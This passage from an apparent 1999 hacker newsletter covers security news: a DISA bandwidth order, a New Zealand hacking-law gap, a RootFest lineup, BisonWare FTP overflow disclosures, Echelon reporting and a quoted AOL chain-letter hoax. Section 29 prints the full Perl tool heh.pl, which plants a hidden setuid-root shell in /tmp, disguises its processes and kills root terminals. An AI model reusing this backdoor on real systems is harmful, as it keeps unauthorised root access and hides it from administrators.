To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in WinAMP 2.x

On NT Server 4 with no Service Packs installed, this causes an application error. Platform is a Cyrix MMX 233.

Access Violation (0xc0000005), Address : 0x62626262

@HWA

26.0 DISA limits network activity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

DISA Limits Network Activity
contributed by erewhon

On April 18, the Defense Information Systems Agency (DISA) canceled all limited peacetime privileges including internet and email usage in an effort to bolster the amount of communications bandwidth. This will prevent all unofficial Internet traffic on the European Command's Common User Data Network (CUDN). The Army's 5th Signal Command has been tasked with monitoring the network for violations of this policy. One civilian employee has reportedly already been fired for surfing for up to 13 hours on two separate occasions. This order is also designed to limit "push" technologies and large email attachments.

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0517/web-lock-5-17-99.html

MAY 17, 1999 . . . 17:55 EDT

U.S. European Command locks down Internet Access

BY DANIEL VERTON (dan_verton@fcw.com)

HEIDELBERG, Germany -- To bolster the amount of communications bandwidth, the U.S. Army and Air Force have significantly curtailed the personal use of the Internet by servicemen under the European Command, including those deployed in the Balkans.

The Defense Information Systems Agency's European field office began an effort to increase by 30 percent the available communications services of the Defense Information Systems Network throughout the European theater to support NATO's humanitarian and combat missions in Yugoslavia.
Hoping to free up needed bandwidth, the Army and Air Force on April 18 issued the policy, which canceled all limited peacetime privileges granted to government and military employees to use government computer systems, particularly e-mail and the Internet, for personal use. The policy will remain in effect for up to one year from the date it was issued. "Our ability to support and sustain classified and unclassified e-mail capability for current operations...is affected by the available bandwidth on the" European Command's Common User Data Network (CUDN), according to the memorandum. "For that reason, it is imperative that [U.S. Army Europe] establish a minimize order immediately to all secure and non-secure network subscribers. Effective immediately, no unofficial Internet traffic may occur on the CUDN until [the] minimize [order] is lifted." The memo specifically directs the Army's 5th Signal Command to actively monitor the network for violations of the policy. It also calls on local unit commanders to brief all their personnel and to "routinely check on user activity" for evidence of inappropriate use of government computers. One civilian government employee has been dismissed based on evidence that he had visited inappropriate Web sites on two separate occasions, totaling up to 13 hours of Web surfing. The military services also have curtailed the use of "push" technologies for continuous news feeds and the attachment of large files to e-mails. The policy allows, however, some leeway for appropriate use of the Internet in support of morale, welfare and recreational activities, such as providing soldiers and airmen deployed in Albania, Macedonia and elsewhere with links to family members in the United States. In addition to slowing down the network, "personal use of Internet services provides a conduit through which information assurance and security can be compromised," according to a spokesman for the Army's European Command. 
"Our information dominance depends on it, and we are running out of pipes."

@HWA

27.0 Money in the bank is an intangible?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

HACKER'S PARADISE
by BHZ, Monday 17th May 1999 on 10:08 pm CET

Looks like after Norway hackers could find their paradise in New Zealand. Law Commission has acknowledged that it is not against the law for a hacker to break into a New Zealand bank's computer system and transfer funds into his or her own bank account. "There cannot be theft under section 220, Crimes Act 1961, of an intangible thing. In (a recent Court of Appeal case) the court held that the definition in section 217 is confined to tangible things and does not extend to ... a credit in a bank account." Read the article on InfoWar.

http://www.infowar.com/hacker/99/hack_051799b_j.shtml

Hacker Sitings and News 5/17/99

New Zealand: Urgent Action Wanted To Protect Banks From Hacking.

THE Law Commission has acknowledged that it is not against the law for a hacker to break into a New Zealand bank's computer system and transfer funds into his or her own bank account.

In a report on computer crime, the commission says that under section 220 of the Crimes Act 1961 it is not against the law to steal something intangible.

"There cannot be theft under section 220, Crimes Act 1961, of an intangible thing. In (a recent Court of Appeal case) the court held that the definition in section 217 is confined to tangible things and does not extend to ... a credit in a bank account."

The Network of Internet Related Organisations is pushing for urgent changes to legislation to protect banks and other organisations from the effects of hackers.

Spokesman Chris Patterson, a solicitor with Hesketh Henry, said it was an understatement to say electronic security in New Zealand was a huge problem.

Mr Patterson said Niro believed an amendment to the Crimes Act should be passed by the Government immediately to stop cyber-criminals.
The Law Commission has recommended that there be four new offences dealing specifically with computer misuse. They are: unauthorised interception of data stored in a computer; unauthorised accessing of data stored in a computer; unauthorised use of data stored in a computer; and unauthorised damaging of data stored in a computer.

Justice Minister Tony Ryall said he planned to introduce a draft bill including the first three offences by the end of next month. But he said the offence of hacking raised more complex issues and would need further consultation before legislation on that was drafted.

THE DOMINION 14/05/1999

@HWA

28.0 r00tfest is coming soon, with some heavyweights planning to attend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ Who; The computer underground, security professionals, IT managers, feds, system administrators, and anyone else who would like to learn more about security.
+ What; A computer security conference that will have speakers, vendors, door prizes, contests, events and more.
+ When; May 21-23, 1999
+ Where; Smack in the middle of North America, in Minneapolis Minnesota at the Minneapolis Convention Center, room 103.
+ Why; To expand your computer security knowledge, visit the famous Mall of America, meet many of the people face to face that you've been talking with over the internet, meet new friends and contacts, and get away from your job for a couple days.
+ Cost; - $40 at the door.

More info at www.rootfest.org

RootFest '99 Speakers

Bruce Schneier - Topic To Be Announced.
Mr. Schneier is the president of Counterpane Systems, and the inventor of the Blowfish algorithm. He is the author of Applied Cryptography, The Electronic Privacy Papers, and E-Mail Security. Mr. Schneier has given talks at DefCon, and the Black Hat Briefings.

Steve Stakton (Optiklenz) - Cisco PIX Firewall Security Analysis
Optiklenz is the founding member of the Legions of the Underground, and their newly formed Legions Interactive.
He is a frequent editor and contributor to the LoU ezine, Keen Veracity.

Adam L. Beberg - Software Development for a Hostile Internet
Adam L. Beberg is the founder and president of Distributed.net, founded in 1997 as a gathering point for research and projects related to distributed computing. Adam is currently working on Cosm, a protocol for large scale distributed computing.

Mike Roadancer - "Hacker - It's not a Dirty Word" Hackers in the workplace.
Mike Roadancer is the president of the Hacker's Defense Foundation.

Brian Ristuccia - Circumventing Censorware, Filtering Proxies, and Government Firewalls.
Mr. Ristuccia is the author of the Internet Alternate Namespace proxy server software and operator of the Anti-Censorware Proxy. He is a University of Massachusetts Computer Science Undergraduate and an employee of Nortel Networks.

Peter Shipley - The results of a 3 year effort multi-modem wardialing on a massive scale.
Security problems occur when obvious security problems are overlooked. One commonly overlooked problem is alternative access methods to a corporate Intranet from an external machine. Many if not most companies are overlooking their secondary vulnerabilities surrounding alternate methods of network access. The results of the completed survey will be analyzed and summarized along with lessons and techniques learned.
Mr. Shipley is a consultant in the San Francisco Bay Area with over thirteen years experience in the Computer Security field. Currently working for KPMG LLP out of the San Jose/Silicon Valley office with the title of "Chief Security Architect". Mr. Shipley is one of the few individuals who is well known and respected in the professional world as well as the underground/hacker community. He has extensive experience in system and network security as well as programming and project design. Mr. Shipley's past accomplishments include first in depth research into the security aspects of wardialing, designing and implementing the first automated network security scanner, among other accomplishments. Mr. Shipley's specialties are third party penetration testing and firewall review, computer risk assessment, and security training. Mr. Shipley also performs post-intrusion analysis as well as expert witness testimony.

Paul McNabb - Trusted Operating Systems Technology in Web-based Computing
Mr. McNabb is the CTO and vice president of Argus Systems Group, Inc. and has over ten years of in-depth experience in the design, development, documentation and testing of secure operating systems and networks. He has also performed security consulting and seminars for various military, government, university and industry groups in numerous countries.

Brenno J.S.A.A.F. de Winter - Internet Security in Europe: State of Affairs.
Brenno de Winter is the president of De Winter Information Solutions, based in the Netherlands. He has years of experience in development, risk assessment and security. He is involved in the development and consultancy of web-based functions and security, and is currently the project leader in end-to-end testing of digital television equipment for Philips (focused on conditional access)

DataShark - All about TEMPEST monitoring
DataShark is a U.S. hacker from the famed Legions of the Underground hacking group. He plans on having a working TEMPEST/van Eck monitoring station in time for RootFest.

Richard Thieme - Cancellation: Date conflict. Look for Mr. Thieme at RootFest 2K.

Bill Campbell - Biometrics: Opportunity and Challenge
Bill Campbell is Principal Consultant with Eagle's Reach, an independent information security and technology risk management firm headquartered in the Boston area.
He was previously Director of Information Security Engineering with Fidelity Investments, and has over 15 years experience in technical security, software development, operations support, and quality assurance in both the private and public sectors. (Eagle's Reach does not develop, market or sell biometric products.)

GloiDemon - Vector-based Super Hashing, Middle East State of Affairs
GloiDemon is a hacker from Kuwait

Winn Schwartau - Time-based Security (via video conference)
Winn Schwartau is the leading authority on Information Warfare. His sites, Infowar.com and Info-Sec.com are some of the most popular security sites on the 'net. He has published many books, including Information Warfare: Chaos on the Electronic Superhighway, and his new book, Time Based Security, the opening chapters of which can be found here. He has given talks at Black Hat, and DefCon.

John Kozubik - Intrusion Detection Systems
John Kozubik has over four years experience in the network security field, and is currently working on VPN's, wireline encryption, and operational Intrusion Detection. He writes a monthly NT security column, available at NetworkCommand, and has written several white papers on Intrusion Detection, Decoy Networks, and Disaster Recovery.

From http://www.403-security.net/

RootFest elite security conference
Astral 13.05.1999 18:45

RootFest is a computer security convention and conference being held in Minneapolis, Minnesota, USA. As far as I know, it's the first of its kind in the whole Midwest. We welcome all computer security professionals, the computer underground, hackers, IT professionals, government agents, feds, MIB, and anyone who would like to come learn about computer security. Check their website RootFest.

http://www.rootfest.org

From http://www.net-security.org/

ROOTFEST IS CLOSE
by BHZ, Friday 14th May 1999 on 1:01 pm CET

Rootfest is coming. It is a security conference held in Minneapolis (USA), which will be very "elite" this year.
Many security professionals are coming to give a speech. The Dutch Brenno de Winter, owner of De Winter Information Solutions, will speak on the State of Affairs in Europe. He did some research and the results are disturbing. Read his article called Robustness of data security is poor. Just to inform our readers that HNS will have a detailed special report on Rootfest.

PRESS ANNOUNCEMENT

Robustness of data security is poor

General

From May 21st till May 23rd a computer security conference, called Rootfest will be held in Minneapolis (USA). At this conference security specialists, the "hacking" society, IT professionals, United States government agents and FBI will come together to discuss computer security. The Dutch Brenno de Winter, owner of De Winter Information Solutions, will speak on the State of Affairs in Europe. For this conference he did some basic research. The results are disturbing.

About Rootfest

Almost anywhere in the world people are becoming aware of the fact that computer crimes are a potential and present danger to our society. Last year Bill Clinton spoke about terrorism moving more towards the computer. With the danger in mind a conference has been organised. At this conference hackers, FBI, police officials, governments, computer specialists and IT security professionals join forces and will focus together on the same problem. Currently somewhere between 600 and 900 attendees are expected to come.

State of Affairs in the Netherlands

Every day more and more is written about e-commerce (electronic sales through the internet). In the Netherlands the internet is pushed by the government in the SWAP 2000 project. SWAP 2000 is an effort to reduce the gap between the Netherlands and the USA in technology. Computer crimes are a real threat to the growth of technology.

The test

The main target was to use a medium that is widely spread and where basic security is simple and cheap. So e-mail was chosen. An artifact of e-mail is that quite often viruses get spread through e-mail (in this context one can think of the very recent Melissa-virus). Since the target was getting a general impression on secure e-mail 39 Dutch organisations have been mailed. These organisations were insurance companies, banks, 12 major ICT companies, 8 government organisations, 4 political parties. Important was that the organisation needs to have reasons to receive confidential documents or the organisation delivers internet-related systems (ICT companies -> they need to indicate the secure way). The e-mail first briefly indicated that sending data per e-mail could mean a risk and then asked what method could be used to send a secure e-mail (encryption).

Remark: e-mails are basically letters that are sent out without an envelope. By using encryption this envelope is provided for the e-mail. E-mails can be easily intercepted and thus read. This can lead to confidential data becoming public. Also without encryption it is very easy to send mail using somebody else's identity. By using encryption signatures can be checked.

Results

When a response came to the request, the answer was noted. When it was stated that e-mail was used for informal communication only that was accepted as a proper solution (because sensitive data was sent by other means). When no response was given, there is a major chance that people start sending the sensitive data without any security measures. So this was regarded as no solution available.

No bank or insurance company has a policy on secure e-mail. One insurance company mailed that they couldn't (of course) inform me on this issue out of security considerations. Only two out of twelve ICT companies had a way of using secure e-mail. Most government organisations only used e-mail as an informal way of communication and thus reduced the risk. One unfortunate thing is the police west-veluwe vallei in the Netherlands that allows people to press charges by e-mail. They use e-mail formally and use not secured forms and thereafter not secured e-mail (although they wrote they were considering their options).

Other facts

Also attention has been paid to the security on laptops. Laptops contain programs and data. This data ought to be encrypted. So if a laptop is stolen no data becomes available. Last year a police team LRT (national detective team) had a laptop that was stolen out of a police building. All data (snitches, cases under investigation) became known. This data was handed to the press. Encryption to prevent this is easy and cheap to get. However less than 7% of the companies checked were protecting their data.

Finally

The several small investigations show, according to Brenno de Winter, that the awareness on data security is way below acceptable point. This may easily lead to major incidents in the future, setting back usage for internet and other ICT solutions. However basic security is often freely available.

About Brenno de Winter

Brenno de Winter, 27, is CEO of De Winter Information Solutions. De Winter Information Solutions is a company that focuses on software development, consultancy and Internet solutions and security. Brenno has been programming since he was twelve years old and working on the internet since 1992. In the so-called Open Source community he is active in several freeware projects, among them the freeware encryption GnuPG.

Further information

If you would like further information you can contact: Brenno de Winter. E-mail: brenno@dewinter.com phone: +31 6-53 53 6508 fax: +31 318-652913. On the internet http://www.dewinter.com For secure e-mail you can find the PGP-public key on http://www.dewinter.com/secure.html For further information on Rootfest you can go to http://www.rootfest.org Some examples on how easy it is to attack security can be shown upon request.

@HWA

29.0 heh.pl creates a number of rootshells in /tmp and disguises itself..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml

Heh.pl - Heh.pl is a program that creates a user specified number of rootshells in /tmp, disguises itself, monitors the clone rootshells, and logs out all root terminals and disables console when desired, giving you time to clean logs and make a quick exit. Simple, but neat. 3k. By feach, We're All Gonna Die cult.

#!/usr/bin/perl
# Heh.pl
# By: feach
#
# this program creates rootshells
# in /tmp you pick the amount of shells, it
# disguises itself, watches for the other clones, and
# kills root if any clones die.
#
# Shouts Out: me, sirgrim, www.WAGD.com, #hacking on webchat
#
#

&set_vars;
while ($famsize > 1) {
  &forker;
  $famsize--;
}
&initialize;
&controlfreak;
die "this shit wont werk were ur dumbass is at";

# THIS IS THE ONLY SECTION YOU NEED TO CHANGE
sub set_vars {
  $famsize = 20;    #how many additional clones do you want
  $rootid = 0;
  $shelltime = 15;  # Tells you to leave the clones out for 15 seconds
  $sleeptime = 45;  #To sleep 45 seconds between clones
  $paranoid = 0;    # set this if you want to kill *all* shells, not just root
  # look at that below get creative make this prog kick some ass
  #@psnames = ('vi','nfsiod','kflushd','kswapd','update','lpd','/usr/sbin/rpc.mountd','/usr/sbin/rpc.nfsd','0wned');
  @psnames = ('dickhead','shitface','fuck','diebitch','x0x','phucewe','mountme','shitd','0wned');
}

sub initialize {
  &set_vars;
  &disguise;
  &scent;
  sleep 2;
  &fraternize;
}

sub disguise {
  srand(time ^ $$);
  $randum = int(rand(9));
  $0 = $psnames[$randum];
}

sub controlfreak {
  $end = 0;
  $slept = 0;
  $shell = 0;
  while ($end < 1) {
    &check_bro;
    sleep 1;
    ++$slept;
    if ($shell == 0 && $slept > $sleeptime) {
      &make_shell;
      $slept = 0;
      $shell = 1;
    }
    if ($shell == 1 && $slept > $shelltime) {
      &kill_shell;
      $slept = 0;
      $shell = 0;
    }
  }
}

sub panic {
  &kill_roots;
  &set_vars;
  while ($famsize > 1) {
    &forker;
    $famsize--;
  }
  &initialize;
  &kill_roots;
}

sub scent {
  open PSLOG, '>>/tmp/31336.tmp';
  print PSLOG "$$-";
  close PSLOG;
}

sub fraternize {
  open (PSLIST, '/tmp/31336.tmp') || die "no ps list!!!\n";
  @brolist = split("-",<PSLIST>);
  close PSLIST;
  sleep (4);
  if (-e '/tmp/31336.tmp') { unlink '/tmp/31336.tmp';}
}

sub check_bro {
  $ok = 0;
  foreach $ps (@brolist) {
    unless (kill 0,$ps) { &panic;}
  }
}

sub make_shell {
  unless (-e '/tmp/.nfsd') {
    system ('cp /bin/sh /tmp/.nfsd');
    system ('chmod 4755 /tmp/.nfsd');
  }
  #system ('touch -t 031320251996 /tmp/.nfsd);
}

sub kill_shell {
  if (-e '/tmp/.nfsd') {
    unlink '/tmp/.nfsd'; #a better shell killer...
  }
}

sub kill_roots {
  open( PSK, "ps -jax |");
  while ($xx = <PSK>) {
    chop ($xx);
    @info = split(" ", $xx, 10);
    if ($info[7] == $rootid && $info[9] =~ 'sh') {
      unless ($info[9] =~ 'flush') {kill 9,$info[1];}
    }
  }
  close(PSK);
}

sub forker {
  $spawn_id = fork();
  die "fork failed: $!" unless defined $spawn_id;
  if ($spawn_id) {
    waitpid($spawn_id,0);
  } else {
    $dfork = fork();
    die "double fork failed $!" unless defined $dfork;
    if ($dfork) { exit 0; }
    $famsize = 0;
  }
}

@HWA

30.0 RedHat 6.0 fixes available for some current vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sun, 16 May 1999 13:01:46 +0200
From: Hugo van der Kooij
To: BUGTRAQ@netspace.org
Subject: Red Hat Linux 6.0 fixes

Hi,

As Red Hat did not send messages around I will fill in this gap for now. (Hello Red Hat. Don't get sloppy on this.)

There are a few fixes available for Red Hat Linux 6.0 which can be found on ftp://updates.redhat.com/6.0/ and these include:

- Newer floppy images for i386.
- newer pump package to fix DHCP anomalies.
- newer xscreensaver package to fix security issues.
- newer apmd package (i386 only)

See also: http://www.redhat.com/corp/support/errata/rh60-errata-general.html

Hugo.

PS: There is no info about these images on the website. But it just adds support for the ICP Vortex controller according to the README file

PS/2: There are some typos on the errata pages. It would be nice if these were fixed as well.

--
Hugo van der Kooij; Oranje Nassaustraat 16; 3155 VJ Maasland
hvdkooij@caiw.nl http://www.caiw.nl/~hvdkooij/
--------------------------------------------------------------
Use of any of my email addresses for unsolicited (commercial) email is a clear intrusion of my privacy and illegal!

@HWA

31.0 BisonWare FTP server vulnerabilities can lead to root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 17 May 1999 12:52:02 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Vulnerabilities in BisonWare FTP Server 3.5

Arne Vidstrom submitted the following observations regarding BisonWare FTP Server 3.5. I contacted the authors of BisonWare and gave them a copy of Arne's message. After each of Arne's observations I include the response from BisonWare's Nick Barnes sent back to me.

If you respond to this message, please ensure you're responding to Arne, Nick, and/or the NTBugtraq list (as opposed to responding to me).

Cheers,
Russ - NTBugtraq Editor

AV=Arne Vidstrom (winnt@BAHNHOF.SE - May 8th, 1999)
NB=Nick Barnes (nick_barnes@compuserve.com - May 16th, 1999)

AV
>Hi everybody,
>
>I've found a few vulnerabilities in BisonWare FTP Server 3.5 (latest
>version). Perhaps they are already known, but here they are:
>
>1) The server doesn't close the old socket from the last PASV command
>when given a new PASV command. Thus, it runs out of buffer space if you
>give lots of PASV commands in a row. Finally, you can't use the server,
>and it consumes lots of memory that isn't released when the client
>disconnects.

NB
>1. Fixed in release 4.1 due out in the next 10 days.

AV
>2) If you log in and give the command "PORT a", and then press Enter
>a few thousand times in a row, the server will crash because it can't
>handle a non-numeric character after PORT and somehow adds all the
>CRLF's to the PORT command in a buffer that seems to overflow.

NB
>2. Fixed in release 4.1

AV
>3) There are buffer overflows for commands that take arguments, for
>example LIST xxxx (1500 characters) and CWD xxx (1500 characters) will
>crash it. This works for the USER command too, so an attacker won't
>need a valid account to crash the server.

NB
>3. Fixed in release 4.1

AV
>4) The account passwords are stored in plaintext in the registry, at
>HKEY_CURRENT_USER\Software\BisonWare\BisonFTP3\Users and are also
>shown when you manage users in the server. They are also added to the
>logs when users log in, depending on how you configure logging. So
>don't put your logs in a directory that can be viewed by FTP users. ;)

NB
>4. Fixed in release 4.1. Passwords will still be stored plain within
>the registry. The registry should only ever be available to the
>administrator, and some large corporate clients use their own software
>to build user lists.

AV
>5) Another point is that after default installation, an anonymous user
>can access everything in your computer because you have to set the
>limitations after installation. You can't really count that as a bug I
>guess, but it's really dangerous anyway... so if you run this server,
>make sure you reconfigure it if you haven't already!!!

NB
>5. This isn't really a bug from our point of view. The whole point is
>to allow FTP operation immediately after install. This is a selling
>advantage over competitive products which require lots of set up before
>you can use them with a client such as your browser.

@HWA

32.0 Key Escrow revisited (who are the real criminals here??)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Key Escrow Not Just to Bust Criminals Anymore
contributed by Weld Pond

A working document for the Scientific and Technological Options Assessment panel, recently released by the European Parliament, claims the United States has tried to persuade European Union countries to adopt its key escrow or key recovery policies. These policies would allow backdoor access to encryption programs. The US has claimed that this was necessary to read messages exchanged by criminals. The report claims however that the UKUSA alliance, which includes the United Kingdom, United States, Canada, Australia, and New Zealand, has used its secret Echelon global spying network to intercept confidential company communications and give them to favored competitors.
The report also claims that the NSA had struck deals with Microsoft, Lotus, and Netscape to alter their products for foreign use, presumably to make it easier for the NSA to intercept communications. C|Net http://www.techweb.com/wire/story/TWB19990518S0004 Technology News Report: U.S. Uses Key Escrow To Steal Secrets (05/18/99, 9:27 a.m. ET) By Madeleine Acey, TechWeb European plans for controlling encryption software are nothing to do with law enforcement and everything to do with U.S. industrial espionage, according to a report released by the European Parliament on Friday. The working document for the Scientific and Technological Options Assessment panel said the United States has tried to persuade European Union countries to adopt its key escrow or key recovery policies -- allowing backdoor access to encryption programs -- saying this was necessary to read messages exchanged by criminals. But the report details how the UKUSA alliance -- made up of the United Kingdom, United States, Canada, Australia, and New Zealand -- has used its secret Echelon global spying network to intercept confidential company communications and give them to favored competitors. Thomson S.A., located in Paris, and Airbus Industrie, based in Blagnac Cedex, France, are said to have lost contracts as a result of information passed to rivals. "The U.S. government misled states in the EU and [Organization for Economic Cooperation and Development] about the true intention of its policy," the report adds. "Between 1993 and 1997 police representatives were not involved in the NSA [National Security Agency]-led policy-making process for key recovery. Despite this, during the same period the U.S. government repeatedly presented its policy as being motivated by the stated needs of law-enforcement agencies." The document went on to detail how the agencies specifically studied Internet data. 
Apart from scanning all international communications lines -- using 120 satellites, microwave listening stations, and an adapted submarine -- it said they stored and analyzed Usenet discussions. "In the U.K., the Defence Evaluation and Research Agency maintains a 1-terabyte database containing the previous 90 days of Usenet messages." The "NSA employs computer 'bots' (robots) to collect data of interest," the report adds. "For example, a New York website known as JYA.COM offers extensive information on cryptography and government communications interception activities. Records of access to the site show that every morning it is visited by a bot from NSA's National Computer Security Center, which looks for new files and makes copies of any that it finds." According to a former employee, NSA had by 1995 installed "sniffer" software to collect traffic at nine major Internet exchange points. The report offered evidence that a leading U.S. Internet and telecommunications company had contracted with the NSA to develop software to capture Internet data of interest, and that deals had been struck with Microsoft, Lotus, and Netscape to alter their products for foreign use. "There can't be any doubt any longer that there's an economic imperative to these policies," said Simon Davies, director of Privacy International. "We have been lied to for years. But it will be up to companies like Airbus to take legal action to force a definition of national security in the context of the European Union. Then we can establish a legal framework and appeals process." Meanwhile, the Financial Times reported on Monday that the U.K. government had agreed to take key escrow "off the agenda" and had accepted industry proposals for a "largely voluntary program of co-operation with the security services". Government officials could not confirm the report. But Caspar Bowden, director of the Foundation for Information Policy Research, questioned how far any compromise would go. 
"Will they persist with statutory licensing [of trusted third parties] and criminal legislation on decryption warrants?" he asked.

Andrew Dornan of Data Communications International contributed to this report.

@HWA

33.0 AOL Under Siege by Hackers, NOT!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by wariac

Print and online media are bad enough but television 'news' has got to be the worst information source on the planet. The local CBS affiliate in Tucson, Arizona, KOLD, ran a lead story on its 10pm "news-cast" last week that claimed that 'hackers' had invaded AOL and were threatening to distribute the personal information of its users. Unless of course that user forwarded an email to 10 other users within 45 minutes. KOLD aired this "news" without confirmation, without contacting an independent third party, without even getting an official response from AOL. All they had was the copy of an email from someone who wasn't even a user of AOL! This email was evidently enough to run a several minute segment as the lead story and scare the hell out of several thousand viewers in the Tucson area. And people wonder why Joe Schmoe is afraid of the Internet.

Star Net Dispatches
http://dispatches.azstarnet.com/joe/1999/0518-926992417.htm

Hacking the boob tube

By Joe Salkowski
StarNet Dispatches
Tue May 18 00:23:01 1999

Head for the hills, everyone: A "hacker group" is conspiring to "create problems in your personal life."

At least, that's the word from the crack investigative reporters at KOLD, Channel 13, Tucson's CBS television affiliate. The station that patrols Tucson's skies in its very own rent-to-own helicopter led its 10 p.m. "news"-cast last Wednesday with a threatening Internet story that apparently escaped the attention of lesser, ground-hugging journalists.

"They say they have your personal information, including credit card numbers and Social Security numbers," anchor Chris Pickel warned in her most ominous tone.
"And unless you do as they say, they're going to use it against you."

Co-anchor Randy Garsee went on to explain that a "hacker group" was sending out e-mail messages threatening to divulge personal information from recipients' America Online accounts unless they forwarded the message to 10 AOL users within 45 minutes.

The report, accompanied by a grammatically challenged "You Got Mail" graphic, was delivered with the breathless rush of a Lewinsky-level scoop. "Does AOL know about this?" Garsee asked reporter Valerie Cavazos. "Well," she responded with barely suppressed glee, "they do now."

Indeed. They know, like most Net users should, that KOLD fell hard for one of the oldest, lamest tricks on the Net.

The menacing message that consumed three minutes of supposedly precious airtime was nothing more than a chain letter - the sort that promises ten years of bad luck will befall those who don't send it along. No "hacker group" or anyone else could carry out the threats contained in the message, and nobody who knew anything about the Net would pass it along.

But KOLD didn't think twice - or even once - before passing the threats along to a few thousand viewers.

"This is not as thorough as we probably could have been," KOLD News Director Carolyn Kane conceded the next day. "Our follow up will say that the only way to get yourself in trouble is to fall for this letter."

The story began when Chris Lamb, a 40-year-old warehouse manager for a local pet supply company, phoned KOLD Wednesday to ask about the e-mail message he'd just received from a friend.

"I called just to see if they had heard anything about it," he said. "I didn't realize what would happen then."

Lamb, who admits he's "not the most computer-literate person," said he wasn't sure the message was authentic. "That's kind of what I mentioned to Channel 13," he said. "But they said they wanted to do the story."

AOL's main office in Virginia was closed by the time Cavazos got the story, Kane said.
So the reporter talked to someone at AOL's local telephone support center who didn't know anything about the message or its claims. Instead of waiting until the next day for an intelligent response from AOL, Cavazos and her editors decided to air her story that night.

"AOL says that this is the first time that they've heard about it and are now frantically trying to figure out if this was a prank or if the hacker group did indeed figure out a way to get into sensitive AOL files," Cavazos reported. She used the word "frantically" again later in her report, suggesting she had a telepathic grasp of happenings inside AOL's headquarters - which were, you'll remember, closed for the night.

Cavazos offered some details from the letter, including its threat that recipients' AOL account would be "messed around with." She also hinted that a "hacker group" could indeed have "cracked" the password to AOL's secret files, a point she illustrated by displaying a Web site with black-market copies of consumer software programs.

Had she instead displayed a clown painting on black velvet, it would have been equally relevant. The fact that consumer software can be "cracked" doesn't prove that a "hacker group" could access the entirety of AOL's account information by figuring out a single password, as the message claimed could be done.

That feat is, in fact, impossible, AOL spokesman Rich D'Amato told me the next day. While he wouldn't divulge how AOL secures that data, he said it wasn't sitting behind a single password on a public Web server. "That's a safe assumption," he said.

"If someone says they have all your personal information, you should react to that the same way you would in real life," D'Amato said. "Take a moment think about it. Don't knee-jerk react to it."

But there wasn't much thinking going on at KOLD last Wednesday.
In fact, it didn't even bother Cavazos that Lamb, the lone on-camera source of her story, isn't an AOL subscriber - meaning he couldn't possibly have been affected by the threats.

Viewers learned this only when Garsee asked Cavazos after her report if Lamb obeyed the commands in the message and what happened if he didn't. "He doesn't know that. Nothing has happened so far. Um, he actually was not an AOL user," she stammered. "So it hasn't affected his AOL program."

So let's get this straight: KOLD led its newscast with a story about a "hacker group" that doesn't exist sending threats that couldn't possibly be carried out to a person who couldn't have been harmed - all after an announcer promised that "For accurate, concise reporting, watch News 13." (For television news reporters who might be reading this story, I'll explain that this qualifies as irony.)

When I called Kane, the news director, she began our conversation by defending the story. "We were just saying this is a letter that people had gotten. Valerie did it from that point of view," she said.

Later, though, she conceded that her station should have held off on the story. "We really should have had whatever AOL says it was," she said. "That's why I'm insisting we make sure we follow this up."

The next night, KOLD's 10 p.m. news included a 30-second segment informing viewers that the message was a hoax. But just to be safe, the anchor advised, don't open e-mail sent from people you don't know.

Say what? Oh, never mind.

If you ever wonder why ordinary, TV-watchin' folk are so afraid of what they might find on the Internet, this comedy of errors should explain things quite nicely. While many reporters have wised up to the realities of the Net, the talking heads of local television news must have been busy fixing their makeup.

Since most local television news reporters are assigned to cover a wide variety of subjects, they aren't likely to become experts in any one of them.
But it shouldn't be too much to ask that they apply a little common sense and basic reporting skills before airing stories that ultimately mislead and confuse their unfortunate audience.

Kane told me her news team would have more Internet related stories in the near future, but I'm not sure I can bear to watch. Before they do another story about the Net, they really ought to dip into their helicopter budget and purchase a clue.

Text of "hacker" e-mail (WARNING: Contains profanity)

Your Screen Name has Been Added to the ß(r)řöôĄ Ł• Hackers List!

Here is how we work. Because we master AOL everytime this letter is sent out a copy is also instantly send to us. We then scan out all the names, and place them on our hackers list. Once you send out this letter 10 times your name again is instantly removed from our list. If this letter is not sent out exactly 45 minutes after you have opened it your name will not be able to be removed from our hacking list.

Here is what happened when your name is stuck on the ß(r)řöôĄ Ł• hackers list.

-Your AOL password is pulled out of AOL's files. Stupidly AOL stores your password on a password access website. We have cracked the password needed and have access to every account except for AOL guides (cat guides).
-We gain your credit card number, social security number, and home address. Your credit card information and home address is stored at the AOL site and with that we can gain you social security number.
-Everytime you sign on AOL your account will be messed around with.
-and much, much more with the power of ß(r)řöôĄ Ł• hackers.

Don't believe this? We don't care at all because not following the directions given will harm you in over 10 ways. All you have to do is send this out to 10 people and you will never have to worry about this again. If you receive this letter again after sending it out you don't need to send it out again, because your name is not able to be put back on.

Why are we doing this?
It is to get back at AOL, and we are taking action. When the members of ß(r)řöôĄ Ł• hackers first signed up for AOL they were not hackers. Once they had to start paying 21 dollars for AOL they decided to fuck over AOL. Also the ß(r)řöôĄ Ł• hackers are doing this because of the many ads on AOL. When you first sign on AOL you receive too many ads and shit when you go to AOL channels, and more pop ads when you click on things. We have had enough! That's why ß(r)řöôĄ Ł• exists. All you must do now is send this to 10 other AOL members and you will never again have to worry about ß(r)řöôĄ Ł• hackers.

SEND THIS OUT NOW TO 10 PEOPLE IF YOU WANT TO SAVE YOUR ACCOUNT, CREDIT CARD, AND MUCH MORE!

@HWA

34.0 Unknown spammer gets sued
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

